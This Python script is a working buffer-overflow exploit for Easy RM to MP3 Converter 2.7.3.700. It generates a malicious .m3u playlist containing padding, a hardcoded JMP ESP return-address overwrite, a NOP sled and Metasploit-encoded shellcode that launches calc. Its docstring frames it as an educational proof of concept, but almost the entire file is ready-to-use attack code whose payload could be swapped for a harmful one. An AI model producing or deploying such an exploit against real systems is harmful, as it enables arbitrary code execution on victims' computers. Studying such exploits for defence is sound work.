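#!/usr/bin/env python
#
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Vulnerability discovered by Crazy_Hacker who reported with a POC
# The poc was for SP2 (it doesn't work) http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt
# Corelanc0d3r wrote the sploit again but to work under SP3
# http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
#
"""Proof-of-concept file generator for the Easy RM to MP3 Converter 2.7.3.700 .m3u overflow.

The script does one thing: it writes a single playlist file (path taken from
``sys.argv[1]``) whose contents are the oversized buffer laid out below --
padding, a 4-byte return-address overwrite, 4 bytes of filler, a NOP sled and
an encoded ``windows/exec CMD=calc`` payload (per the msfpayload comment).
Nothing is executed here; the file is only written to disk.

Educational notes for reviewers: the crash is a classic stack overflow in the
playlist parser, the overwrite value is a fixed address in MSRMCc_2 (see the
comment on that line), and the payload was encoded to avoid the bytes
``\\x00 \\x09 \\x0a`` according to the msfencode command line recorded below.
"""
import sys


def usage():
    """Print the banner and usage line and exit(1) unless argv is exactly [script, file]."""
    if len(sys.argv) != 2:
        print('''
|-----------------------------------------------|
|[+] Easy RM to MP3 Converter 2.7.3.700 exploit |
|[+] Tested on: Windows XP SP2 (ENG)            |
|[+] Home: http://lnxg33k.wordpress.com         |
|[+] Written by: Ahmed el-3ntry aka lnxg33k     |
|[+] Email me @: ahmed [at] isecur1ty.org       |
|-----------------------------------------------|
''')
        print('Usage:\n\t%s [file.m3u]' % sys.argv[0])
        sys.exit(1)


usage()
m3uf = sys.argv[1]

# Buffer layout, in the order it is written to the file.
buff = b'A' * 26072                  # padding up to the saved return address
buff += b'\x3a\xf2\xa8\x01'          # EIP overwrite MSRMCc_2 (01A8F23A JMP ESP)
buff += b'CCCC'                      # 4 bytes of garbage
buff += b'\x90' * 25                 # 25 bytes of nop sleds
# sh-4.1$ msfpayload windows/exec CMD=calc r | msfencode -a x86 -b '\x00\x09\x0a' -t c
buff += (b"\xba\xf8\x41\x8a\x4a\xd9\xf7\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
         b"\x32\x83\xeb\xfc\x31\x53\x0e\x03\xab\x4f\x68\xbf\xb7\xb8\xe5"
         b"\x40\x47\x39\x96\xc9\xa2\x08\x84\xae\xa7\x39\x18\xa4\xe5\xb1"
         b"\xd3\xe8\x1d\x41\x91\x24\x12\xe2\x1c\x13\x1d\xf3\x90\x9b\xf1"
         b"\x37\xb2\x67\x0b\x64\x14\x59\xc4\x79\x55\x9e\x38\x71\x07\x77"
         b"\x37\x20\xb8\xfc\x05\xf9\xb9\xd2\x02\x41\xc2\x57\xd4\x36\x78"
         b"\x59\x04\xe6\xf7\x11\xbc\x8c\x50\x82\xbd\x41\x83\xfe\xf4\xee"
         b"\x70\x74\x07\x27\x49\x75\x36\x07\x06\x48\xf7\x8a\x56\x8c\x3f"
         b"\x75\x2d\xe6\x3c\x08\x36\x3d\x3f\xd6\xb3\xa0\xe7\x9d\x64\x01"
         b"\x16\x71\xf2\xc2\x14\x3e\x70\x8c\x38\xc1\x55\xa6\x44\x4a\x58"
         b"\x69\xcd\x08\x7f\xad\x96\xcb\x1e\xf4\x72\xbd\x1f\xe6\xda\x62"
         b"\xba\x6c\xc8\x77\xbc\x2e\x86\x86\x4c\x55\xef\x89\x4e\x56\x5f"
         b"\xe2\x7f\xdd\x30\x75\x80\x34\x75\x89\xca\x15\xdf\x02\x93\xcf"
         b"\x62\x4f\x24\x3a\xa0\x76\xa7\xcf\x58\x8d\xb7\xa5\x5d\xc9\x7f"
         b"\x55\x2f\x42\xea\x59\x9c\x63\x3f\x3a\x43\xf0\xa3\xbd")

# Bug fix: the original wrote ``f.close`` without parentheses, which only
# evaluates the bound method and never closes the file. A context manager
# guarantees the close. Binary mode plus ``bytes`` literals keep the buffer
# byte-for-byte as written above (text mode would re-encode it on Python 3).
with open(m3uf, 'wb') as f:
    f.write(buff)
print('\n[+] File written successfully in %s\n' % m3uf)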